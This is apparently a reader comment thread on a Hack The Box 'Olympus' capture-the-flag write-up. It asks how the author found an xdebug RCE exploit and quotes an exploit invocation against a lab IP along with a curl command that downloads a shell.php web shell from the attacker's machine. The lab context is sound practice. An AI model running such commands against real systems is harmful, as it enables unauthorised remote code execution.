Olympus WriteUp (English & Spanish)

https://ironhackers.es/en/writeups/writeup-olympus-hackthebox/

Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

Lesson learned, thanks.

Thank you very much for your writeups.

May I ask you 2 questions:

…Question 1:

I wonder what keywords in Google you used to find this github.com link:
vulhub/php/xdebug-rce at master · vulhub/vulhub · GitHub

I tried these keywords in Google without success.
Google:
xdebug exploit
xdebug exploit shell
xdebug exploit rce
xdebug exploit repository
xdebug vulnerabilities
xdebug php exploit

…Question 2 has 2 sub questions:

You wrote in your writeup:

./xdebug-shell.py -u http://10.10.10.83

We upload a shell; from the obtained shell:

curl -O http://miIp/shell.php

…Is this “xdebug-shell.py” the code copied from

?

…I guess miIp means the IP address of my Kali Linux?

Please advise.

Thanks a million.

I guess the keywords to search on Google were:

php debug rce